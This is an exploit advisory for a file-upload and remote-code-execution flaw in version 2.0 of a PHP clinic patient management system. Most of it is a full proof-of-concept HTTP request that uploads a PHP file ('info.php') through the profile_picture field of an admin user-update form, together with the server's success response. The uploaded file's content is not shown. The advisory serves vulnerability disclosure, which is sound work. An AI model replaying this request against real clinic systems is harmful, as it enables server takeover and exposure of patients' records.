# Titles: PHP - CPMS Version 2.0 File Upload and Remote Code Execution - RCE Vulnerabilities
# Author: nu11secur1ty
# Date: 12/19/2024
# Vendor: https://github.com/oretnom23
# Software:
https://www.sourcecodester.com/php-clinics-patient-management-system-source-code#comment-105951
# Reference: https://portswigger.net/web-security/file-upload &
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload
## Description:
profile_picture parameter is not sanitizing correctly for file upload
extension vulnerabilities.
The malicious admin actor can upload a very dangerous PHP file to the
server and execute it directly from his browser.
STATUS: HIGH-CRITICAL Vulnerability
[+]PoC:
```POST
POST /pwnedhost/pms/update_user.php?user_id=1 HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=9frtcadqm6q0ttavrpjquh3hif
Content-Length: 728
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: https://192.168.100.45
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary2AQt0lyUq6vhBVY9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.100.45/pwnedhost/pms/update_user.php?user_id=1
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="hidden_id"
1
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="display_name"
Administrator
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="password"
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="profile_picture"; filename="info.php"
Content-Type: application/octet-stream
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="save_user"
------WebKitFormBoundary2AQt0lyUq6vhBVY9--
```
[+]Response:
```
HTTP/1.1 302 Found
Date: Fri, 03 Jan 2025 09:10:14 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: congratulation.php?goto_page=users.php&message=user update
successfully
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 10476
Update User Details - Clinic's Patient Management System in
PHP
```
# Reproduce:
[href](https://www.patreon.com/posts/cpms-version-2-0-119208840)
## Time spent:
00:15:00